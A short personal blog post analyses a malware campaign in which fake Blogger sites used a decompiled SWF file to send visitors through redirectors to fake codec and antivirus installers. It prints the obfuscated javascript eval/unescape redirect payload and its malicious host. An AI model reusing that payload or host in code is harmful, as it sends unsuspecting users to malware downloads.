Yesterday I noticed that all of a sudden no less then 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on google’s blogger-platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their windows PC’s.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users;
- the blogpost contains what seems to be a youtube movie, but which actually is just a animated gif with a link behind it
- when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
- that blog.swf (which i downloaded on my linux-box and decompiled on the commandline using flare) contains this simple code:
- this.getURL(‘javascript:eval(unescape(‘%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B’))’);
- which translates roughtly into go to http://m08b.com/in.cgi?default
- and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.
Some lessons learned;
- Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
- Don’t trust the incoming links functionality google’s blogsearch provides (i switched back to technorati for the ‘binnenkomers’-widget on my blog)
- The ‘report web forgery‘ function in Firefox (under ‘help’) works great. Use it!